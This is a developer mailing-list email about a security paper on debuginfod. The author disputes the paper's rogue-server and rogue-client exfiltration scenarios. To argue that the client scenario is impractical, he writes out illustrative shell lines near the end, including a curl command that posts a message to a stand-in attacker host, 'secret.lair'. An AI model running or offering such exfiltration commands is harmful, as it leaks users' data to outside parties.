From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from elastic.org (elastic.org [96.126.110.187]) by sourceware.org (Postfix) with ESMTPS id 4D811385828D for ; Sun, 29 Oct 2023 18:54:05 +0000 (GMT) DMARC-Filter: OpenDMARC Filter v1.4.2 sourceware.org 4D811385828D Authentication-Results: sourceware.org; dmarc=pass (p=quarantine dis=none) header.from=elastic.org Authentication-Results: sourceware.org; spf=pass smtp.mailfrom=elastic.org ARC-Filter: OpenARC Filter v1.0.0 sourceware.org 4D811385828D Authentication-Results: server2.sourceware.org; arc=none smtp.remote-ip=96.126.110.187 ARC-Seal: i=1; a=rsa-sha256; d=sourceware.org; s=key; t=1698605646; cv=none; b=uU7u+Khb8MDBlhjG2hJeoALOhUmTT/OB59VEgVnpij6N506ZSyzXbq9B7W60s8gPywk2y6ys5d64Z4A+syjzABooKQ5SXcLKMUbUdViHE13J1BuAQpvt42Z4H1Xf6Qq+ObxQdU+NOLahqnTVnRM/hj7jJg9KlHuTrWuhmFTKCxI= ARC-Message-Signature: i=1; a=rsa-sha256; d=sourceware.org; s=key; t=1698605646; c=relaxed/simple; bh=J0XujxiIBLTNdGLONiiOH7dPLrUBCzxF6sYJdswlWgg=; h=DKIM-Signature:Date:From:To:Subject:Message-ID:MIME-Version; b=dbPAz9A8N4UltM4NnfuevaTKagIyb3MNumPRy/3R3++maUL0/6MdfyjDO5OwHzvg8hbOSdvXojbQ69msLxSYurIM3KH/wCtQX66+dxk8t7/e0L1J/XY1pq8o+6JjFZp13CY3F8L1BS2Qq4j1c0fmayP0p+l9awxkVGJVFYtOYOA= ARC-Authentication-Results: i=1; server2.sourceware.org DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=elastic.org ; s=default2; h=Content-Type:MIME-Version:Message-ID:Subject:To:From:Date: Sender:Reply-To:Cc:Content-Transfer-Encoding:Content-ID:Content-Description: Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID: In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:List-Subscribe: List-Post:List-Owner:List-Archive; bh=BzSr8SeQlNRpZakE/ZLISI8zBKRiNkfrxjUjz2WIf+Q=; b=hBtWN2yZWwbFvfBkhBO4p0dHvz SxBJisYXvRAUclivcER3ZFnn9SqNJpVh+X6CXBTJfPur3ubmR2la2wrJQdkV0BmINbrOdxoaRBQrX C4tvMvaoMtdWDzKTrBP2XHeSYytS/4SqYsIGrMHtj9f04QH8zH1ICIQO1AK5fTS5kCrQibL1qYeXK hB6P93MSwDtcRxKRxgXFJcD/jvYgFEYtGFh6/CvsFMWKCurr80qiFbEUSnA6OkGWrdSALiAz5N67A /ONx3uLvsMXz2k1LPo30wgOXouLzU8N5Pk5waRg1uWOYM4Cb7IUvBRE1wDgNA/JCshwLkTCsPU6E1 55+wP9gg==; Received: from vpn-home.elastic.org ([10.0.0.2] helo=elastic.org) by elastic.org with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96.2) (envelope-from ) id 1qxAvE-0002mm-2S for elfutils-devel@sourceware.org; Sun, 29 Oct 2023 18:54:04 +0000 Received: from very.elastic.org ([192.168.1.1]) by elastic.org with esmtp (Exim 4.96.2) (envelope-from ) id 1qxAvE-000G0I-1F for elfutils-devel@sourceware.org; Sun, 29 Oct 2023 14:54:04 -0400 Received: from fche by very.elastic.org with local (Exim 4.96.1) (envelope-from ) id 1qxAvE-007nSg-14 for elfutils-devel@sourceware.org; Sun, 29 Oct 2023 14:54:04 -0400 Date: Sun, 29 Oct 2023 14:54:04 -0400 From: "Frank Ch. Eigler" To: elfutils-devel@sourceware.org Subject: regarding the "Abusing gdb Features for Data Ingress & Egress" paper Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Sender-Verification: "" X-Spam-Status: No, score=-102.0 required=5.0 tests=BAYES_00,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,SPF_HELO_PASS,SPF_PASS,TXREP,USER_IN_WELCOMELIST,USER_IN_WHITELIST autolearn=ham autolearn_force=no version=3.4.6 X-Spam-Checker-Version: SpamAssassin 3.4.6 (2021-04-09) on server2.sourceware.org List-Id: Hi - A few days ago, I was pointed to a paper [1] from a security researcher that deals with debuginfod. The first half of the paper is a fine overview of how the system works. [1] https://www.archcloudlabs.com/projects/debuginfod/ The second half takes a turn toward security concerns. I'd like to address a few points there. "Rogue Server - Sending Arbitrary Data to Clients" This section appears to be belabouring the point already given in the debuginfod man page. Yes, indeed, if your chosen debuginfod server is hypothetically fed bad data or is compromised, you may receive bad data. The paper does not identify any actual vulnerability or means to compromise any operating debuginfod servers. Note that we are in the process of adding a degree of cryptographic assurance of data provenance [2] to debuginfod. This aims to provide protection against accidental or deliberate corruption anywhere between the distribution's build system and the debuginfod client. [2] https://sourceware.org/bugzilla/show_bug.cgi?id=28204 "Rogue Client - Sending Arbitrary Data to Servers" This section posits a situation where you wish to exfiltrate data, and you want to do this by running gdb on binaries with crafted buildids. That gdb would then communicate those crafted buildids to a debuginfod server in your control. This is a fascinating hypothetical, and makes this writer curious about what manner of system offers this kind of privilege to an attacker: % gcc foo.c % export DEBUGINFOD_URLS=https://secret.lair/ % for snippet in $message; do % reverse-engineering-tool a.out $snippet % gdb a.out % done but not something as simple as: % curl -F message=$message https://secret.lair/ - FChE